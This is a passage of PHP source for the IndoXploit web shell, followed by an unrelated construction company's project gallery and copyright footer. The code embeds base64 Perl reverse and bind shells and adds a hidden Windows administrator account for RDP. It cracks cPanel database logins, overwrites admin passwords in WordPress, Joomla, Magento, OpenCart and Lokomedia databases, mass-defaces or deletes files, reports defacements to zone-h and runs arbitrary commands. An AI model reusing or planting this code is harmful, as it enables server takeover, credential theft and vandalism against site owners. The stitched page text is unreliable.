$bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
save("/tmp/bc.pl", "w", base64_decode($bc['code']));
$bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
sleep(1);
print "
".$bc['exec']."\n".exe("ps aux | grep bc.pl")."
";
@unlink("/tmp/bc.pl");
}
}
elseif($args[0] === "bp") {
if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));

if($args[2] === "perl") {
$bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
save("/tmp/bp.pl", "w", base64_decode($bp['code']));
$bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
sleep(1);
print "
".$bp['exec']."\n".exe("ps aux | grep bp.pl")."
";
@unlink("/tmp/bp.pl");
}
}
else {
print color(1, 1, "Unknown '".$args[0]."'");
}
}
elseif($toolsname === "krdp") {
$args = explode(" ", $args);

if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists."));

$add_user   = exe("net user indoxploit indoxploit /add");
     $add_groups1 = exe("net localgroup Administrators indoxploit /add");
     $add_groups2 = exe("net localgroup Administrator indoxploit /add");
     $add_groups3 = exe("net localgroup Administrateur indoxploit /add");

     print "[ RDP ACCOUNT INFO ]

     ------------------------------

     IP: ".color(1, 2, $GLOBALS['SERVERIP'])."

     Username: ".color(1, 2, "indoxploit")."

     Password: ".color(1, 2, "indoxploit")."

     ------------------------------


     [ STATUS ]

     ------------------------------

     ";

     if($add_user) {
     print "[add user] -> ".color(1, 2, "SUCCESS")."
";
     }
     else {
     print "[add user] -> ".color(1, 1, "FAILED")."
";
     }
    
     if($add_groups1) {
         print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."
";
     }
     elseif($add_groups2) {
            print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."
";
     }
     elseif($add_groups3) {
            print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."
";
     }
     else {
     print "[add localgroup] -> ".color(1, 1, "FAILED")."
";
     }

     print "------------------------------
";
}
}

function files_and_folder() {
if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
print '
  
  
  
  
  
  
  
  
   ';

if(function_exists('opendir')) {
if($opendir = opendir(path())) {
while(($readdir = readdir($opendir)) !== false) {
$dir[] = $readdir;
}
closedir($opendir);
}
sort($dir);
} else {
$dir = scandir(path());
}

foreach($dir as $folder) {
$dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
if(!is_dir($dirinfo['path'])) continue;
$dirinfo['type']  = filetype($dirinfo['path']);
$dirinfo['time']  = date("F d Y g:i:s", filemtime($dirinfo['path']));
$dirinfo['size']  = "-";
$dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
$dirinfo['link']  = ($folder === ".." ? "$folder" : ($folder === "." ?  "$folder" : "$folder"));
$dirinfo['action']= ($folder === '.' || $folder === '..') ? "newfile | newfolder" : "rename | delete";
if(function_exists('posix_getpwuid')) {
$dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
$dirinfo['owner'] = $dirinfo['owner']->name;
} else {
$dirinfo['owner'] = fileowner($dirinfo['path']);
}
if(function_exists('posix_getgrgid')) {
$dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
$dirinfo['group'] = $dirinfo['group']->name;
} else {
$dirinfo['group'] = filegroup($dirinfo['path']);
}
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
}
foreach($dir as $files) {
$fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
if(!is_file($fileinfo['path'])) continue;
$fileinfo['type'] = filetype($fileinfo['path']);
$fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
$fileinfo['size'] = filesize($fileinfo['path'])/1024;
$fileinfo['size'] = round($fileinfo['size'],3);
$fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
$fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
if(function_exists('posix_getpwuid')) {
$fileinfo['owner'] =  (object) @posix_getpwuid(fileowner($fileinfo['path']));
$fileinfo['owner'] = $fileinfo['owner']->name;
} else {
$fileinfo['owner'] = fileowner($fileinfo['path']);
}
if(function_exists('posix_getgrgid')) {
$fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
$fileinfo['group'] = $fileinfo['group']->name;
} else {
$fileinfo['group'] = filegroup($fileinfo['path']);
}
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
}

print "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
".$dirinfo['link']."".$dirinfo['type']."".$dirinfo['size']."".$dirinfo['time']."".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."".$dirinfo['perms']."".$dirinfo['action']."
$files".$fileinfo['type']."".$fileinfo['size']."".$fileinfo['time']."".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."".$fileinfo['perms']."edit | rename | delete | download
";
print "
Copyright &copy; ".date("Y")." - ".color(1, 2, "IndoXploit")."
";
}


function action() {
tools("upload");
tools("cmd");
print "
";
print "
";
print "";
print "
";
print "
";


if(isset($_GET['do'])) {
if($_GET['do'] === "cmd") {
if(isset($_POST['cmd'])) {
if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
tools("readfile", $match[1]);
}
elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
tools("spawn", $match[1]);
}
elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
tools("symlink");
}
elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
tools("network", $match[1]);
}
elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
tools("krdp");
}
elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
tools("jumping");
}
elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
tools("idxconfig");
}
elseif(preg_match("/^logout$/", $_POST['cmd'])) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
print "";
}
elseif(preg_match("/^killme$/", $_POST['cmd'])) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
@unlink(__FILE__);
print "";
}
else {
print "
".exe($_POST['cmd'])."
";
}
}
else {
files_and_folder();
}
}
elseif($_GET['do'] === "zoneh") {
if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
$nick = $_POST['nick'];
$domain = explode("\r\n", $_POST['url']);

print "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
";
print "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

";

foreach($domain as $no => $url) {
$no   = ($no+1).".";
$post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
print "$no $url -> ".color(1, 2, "OK")."
";
} else {
print "$no $url -> ".color(1, 1, "ERROR")."
";
}
}
}
else {
print "

            Defacer:

           


            Domains:

           

           
           
";
   }
}
elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
$connect = mysql_connect('localhost', $ucp, $pcp);
if($connect) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp === '' || $pcp === '') {
//
} else {
$i++;
print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
if(!getdomainname()) print color(1, 1, "Can't get domain name");
foreach(getdomainname() as $domain) {
$userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
$userdomain = $userdomain->name;
if($userdomain === $user) {
print "".color(1, 2, $domain)."
";
break;
}
}
print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
print ")
";
}
}
mysql_close($connect);
}
}
}
print ($i === 0) ? "" : "

".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."

";
} else {
print "

   NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

  

   USER:

  

   PASS:

   Grab Password from Link Config:

  
  
  

  

  
  
";
}
}
elseif($_GET['do'] == 'mpc') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
print "username atau password harus lebih dari 6 karakter";
}
else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];

if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
$get = curl($conf);
preg_match_all('//', $get, $link);
foreach($link[1] as $link_config) {
$scan_conf[] = "$link_config.txt";
}
}
else {
$scan_conf = scandir($conf);
}

foreach($scan_conf as $file_conf) {
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = getValue($config,"host = '","'");
$dbuser = getValue($config,"user = '","'");
$dbpass = getValue($config,"password = '","'");
$dbname = getValue($config,"db = '","'");
$dbprefix = getValue($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = getValue($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
print "Config => ".$file_conf."
";
print "CMS => Joomla
";
if($site == '') {
print "Sitename => ".color(1, 1, "Can't get domain name")."
";
}
else {
print "Sitename => $site
";
}
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = getValue($config,"DB_HOST', '","'");
$dbuser = getValue($config,"DB_USER', '","'");
$dbpass = getValue($config,"DB_PASSWORD', '","'");
$dbname = getValue($config,"DB_NAME', '","'");
$dbprefix = getValue($config,"table_prefix  = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$url_target = "Login =>
$target/wp-login.php
";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
print "Config => ".$file_conf."
";
print "CMS => Wordpress
";
print $url_target;
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
}
elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = getValue($config,"");
$dbuser = getValue($config,"");
$dbpass = getValue($config,"");
$dbname = getValue($config,"");
$dbprefix = getValue($config,"");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$url_target = "Login => $target/admin/
";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
print "Config => ".$file_conf."
";
print "CMS => Magento
";
print $url_target;
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = getValue($config,"'DB_HOSTNAME', '","'");
$dbuser = getValue($config,"'DB_USERNAME', '","'");
$dbpass = getValue($config,"'DB_PASSWORD', '","'");
$dbname = getValue($config,"'DB_DATABASE', '","'");
$dbprefix = getValue($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = getValue($config,"HTTP_SERVER', '","'");
if($target == '') {
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$url_target = "Login => $target
";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
print "Config => ".$file_conf."
";
print "CMS => OpenCart
";
print $url_target;
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
}
elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = getValue($config,'server = "','"');
$dbuser = getValue($config,'username = "','"');
$dbpass = getValue($config,'password = "','"');
$dbname = getValue($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
if($target2 == '') {
$url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
$url_target2 = "Login => $target2/adminweb
";
}
elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "Login => $target2/lokomedia/adminweb
";
}
else {
$url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
$url_target = "Login => $target/adminweb
";
}
elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "Login => $target/lokomedia/adminweb
";
}
else {
$url_target = "Login => $target [ gatau admin login nya dimana :p ]
";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
print "Config => ".$file_conf."
";
print "CMS => Lokomedia
";
if(preg_match("/Can't get domain name/", $url_target)) {
print $url_target2;
}
else {
print $url_target;
}
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
}
}
}
}
else {
print "

Mass Password Change



DIR ConfigLINK Config




Set User & Pass:






";
}
}
elseif($_GET['do'] === "mass") {
if($_POST['start']) {
if($_POST['mass_type'] === 'singledir') {
print "
";
massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
print "
";
}
elseif($_POST['mass_type'] === 'alldir') {
print "
";
massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
print "
";
}
elseif($_POST['mass_type'] === "delete") {
print "
";
massdelete($_POST['d_dir'], $_POST['d_file']);
print "
";
}
}
else {
print "

   Tipe Sabun:

   Mass Deface Single DirectoryMass Deface All DirectoryMass Delete File

   ( kosongkan 'Index File' jika memilih Mass Delete File )


   Folder:

  


   Filename:

  


   Index File:

  

  
  
";
}
}
elseif($_GET['do'] == 'fakeroot') {
ob_start();

$site = explode("\r\n", $_POST['url']);
$user = usergroup()->name;
$file = $_POST['file'];

if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));


if($_POST['reverse']) {
if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));

save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);

foreach($site as $url) {
$cek = curl("$url/~$user/$file");
if(preg_match("/hacked/i", $cek)) {
print "URL: $url/~$user/$file -> Fake Root!
";
}
}
} else {
print "

Filename:


User:


Domain:



Index File:






NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
";
}
}
elseif($_GET['do'] === 'lre') {
if(file_exists("makman.php")) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
if(getfile("LRE")) {
print "";
}
else {
print color(1, 1, "Error while downloading file makman.");
@unlink("makman.php");
}
}

}
}
elseif(isset($_GET['act'])) {
if($_GET['act'] === 'newfile') {
if($_POST['save']) {
$filename = htmlspecialchars($_POST['filename']);
$fopen    = fopen($filename, "a+");
if($fopen) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
}
print $act;
print "

Filename:

";
}
elseif($_GET['act'] === 'newfolder') {
if($_POST['save']) {
$foldername = path().'/'.htmlspecialchars($_POST['foldername']);
if(!@mkdir($foldername)) {
$act = color(1, 1, "Permission Denied!");
}
else {
$act = "";
}
}
print $act;
print "

Folder Name:

";
}
elseif($_GET['act'] === 'rename_folder') {
if($_POST['save']) {
$rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
if($rename_folder) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
print "$act
";
}
print "



";
}
elseif($_GET['act'] === 'delete_folder') {
if(is_dir(path())) {
if(is_writable(path())) {
@rmdir(path());
if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
$act = "";
}
else {
$act = color(1, 1, "Could not remove directory '".basename(path())."'");
}
}
print $act;
}
elseif($_GET['act'] === 'view') {
print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
";
print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
";
print "";
}
elseif($_GET['act'] === 'edit') {
if($_POST['save']) {
$save = file_put_contents($_GET['file'], $_POST['src']);
if($save) {
$act = color(1, 2, "File Saved!");
}
else {
$act = color(1, 1, "Permission Denied!");
}
print "$act
";
}

print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
";
print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
";
print "




";
}
elseif($_GET['act'] === 'rename') {
if($_POST['save']) {
$rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
if($rename) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
print "$act
";
}

print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
";
print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
";
print "



";
}
elseif($_GET['act'] === 'delete') {
$delete = unlink($_GET['file']);
if($delete) {
$act = "";
}
else {
$act = color(1, 1, "Permission Denied!");
}
print $act;
}
}
else {
files_and_folder();
}
}

serverinfo();
action();
?>


  


[1/2]

Martin Luther King Hospital

Martin Luther King Hospital

Martin Luther King Hospital

Martin Luther King Hospital

Martin Luther King Hospital

Martin Luther King Hospital

El Cariso Swimming Pool

LADPW Award

Camp Pendleton ROICC Modular Complex

Fire Station #89

RPV

LA DPW - DPW Headquaters

Pamela Park Gymnasium

SAN DIEGO - Naval Base RV Park

29 PALMS

VENTURA - Faria County Park

SHERIFF - Long Beach Airport2

SHERIFF - Long Beach Airport

CSUN - Oviatt Library




no image

LA DPW -Van Nuys Superior Court

 1[2]  [end] 


Copyright © 2019 MTM Construction, Inc. All rights reserved.